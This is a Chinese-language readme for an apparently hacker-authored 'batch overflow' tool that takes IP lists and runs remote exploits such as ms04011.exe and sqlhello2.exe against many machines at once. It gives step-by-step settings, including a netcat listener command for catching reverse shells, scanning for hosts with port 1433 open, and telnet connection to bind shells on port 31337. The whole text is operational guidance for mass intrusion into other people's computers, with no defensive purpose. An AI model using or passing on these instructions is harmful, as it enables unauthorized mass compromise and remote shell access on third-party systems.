通用批量溢出程序 Ver1.2 作者:haicao [E.S.T] http://haicao.126.com 本程序的功能就是自动从IP列表文件读取IP进行自动批量溢出。 批量溢出的成功率取决于相应的溢出程序进行溢出时的成功率。 因为所有远程溢出程序(无论新旧)都有共同的使用方式所以就有了这个程序。 Ver 1.2 新版修改了以下几点: 1.增加了对反向溢出的支持 2.给出了当前溢出IP 3.可以把批量溢出的结果输出到文件debug.txt 如果你进行的是反向的批量溢出请先把默认监听命令nc.exe -vv -l -p 80后面的80改成你要在本机监听的端口。然后点监听按钮在本地开一定数量的本地端口监听。 然后填写正确的溢出格式。 举例:sbaa的ms04011.exe溢出格式为:  ms04011.exe 0 ip backport backip 则有关设置如下: 监听命令:nc.exe -vv -l -p 80点监听在本地开始监听。 然后:设置参数: 程序名ms04011.exe (把这个溢出程序放在同一目录) 前缀参数:0 IP列表文件:选择一个只含IP列表的文件 端口:80 后缀参数:本机IP(比如:192.168.0.1)也可以把本机IP填到端口后面中间用空格格开。
有的溢出程序溢出后直接连接到相应的一个SHELL这时选择第一个单选钮:溢出后直接得到SHELL 有的溢出程序是溢出后再连接到某个端口。这时侯请选择溢出后连接到31337这个单选钮,会在溢出后自动调用TELNET去连接某个端口。 Ver 1.1 版介绍 有些溢出漏洞出来以后没人写出扫描程序,所以我就用一个土办法就是只溢出那些开相应端口的程序,没办法菜鸟能做的就这一些了~~~程序原理就是从IP文件读取IP用SHELL调用溢出程序进行尝试溢出。这个程序很有物用价值哦!嚯嚯! 用法: 首先用SUPERSCAN扫描开1433的机子,然后提取开符合条件(比如开了某个端口)IP地址,可以使用我写的小程序IP提取器提取IP列表文件(我的主页下载) 命令格式分解成: 程序名 前缀参数 IP 端口 后缀参数 比如MSSQL HELLO溢出程序直接溢出格式为 sqlhello2.exe ip 1433 则程序名添上sqlhello2.exe IP列表文件选择一个IP文件,端口添上1433 又比如sbaa的ms04011溢出程序格式为ms04011 0 ip 端口 则同上,只要在前缀参数上多添上0就可以了。单选选中下面一个然后添上对应的端口。 有些溢出是溢出成功后自己尝试连接到SHELL绑定端口,而有些程序则要溢出后,让我们连接到某个端口,如果是前者则单选选第一个,如果是后者则单选选中溢出后尝试连接到某个端口(注意添上端口号!) 对于反向批量溢出则手动在本地监听某个端口一次溢出一个机器就可以了.
|